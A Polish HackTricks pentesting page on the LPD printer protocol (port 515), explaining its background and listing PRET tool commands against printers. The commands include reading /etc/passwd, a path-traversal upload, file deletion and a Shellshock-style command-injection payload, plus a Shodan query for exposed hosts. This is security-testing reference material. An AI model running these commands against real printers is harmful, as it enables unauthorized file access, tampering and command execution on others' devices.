4.2 KiB
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź SUBSCRIPTION PLANS!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.
Wprowadzenie do protokołu LPD
W latach 80. XX wieku został opracowany protokół Line Printer Daemon (LPD) w systemie Berkeley Unix, który później został formalizowany w RFC1179. Protokół ten działa na porcie 515/tcp i umożliwia interakcję za pomocą polecenia lpr
. Istota drukowania za pomocą LPD polega na wysyłaniu pliku kontrolnego (w celu określenia szczegółów zadania i użytkownika) wraz z plikiem danych (który zawiera informacje do wydruku). Podczas gdy plik kontrolny umożliwia wybór różnych formatów plików dla pliku danych, obsługa tych plików zależy od konkretnej implementacji LPD. Powszechnie uznawaną implementacją dla systemów Unixopodobnych jest LPRng. Należy zauważyć, że protokół LPD może być wykorzystany do wykonania złośliwych zadań drukowania PostScript lub PJL.
Narzędzia do interakcji z drukarkami LPD
PRET wprowadza dwa niezbędne narzędzia, lpdprint
i lpdtest
, które oferują prosty sposób interakcji z drukarkami kompatybilnymi z LPD. Narzędzia te umożliwiają wykonanie szeregu działań, od drukowania danych po manipulację plikami na drukarce, takie jak pobieranie, przesyłanie lub usuwanie:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Dla osób zainteresowanych dalszym zgłębianiem dziedziny hakowania drukarek, kompleksowe źródło można znaleźć tutaj: Hacking Printers.
Shodan
port 515
Naucz się hakowania AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź SUBSCRIPTION PLANS!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.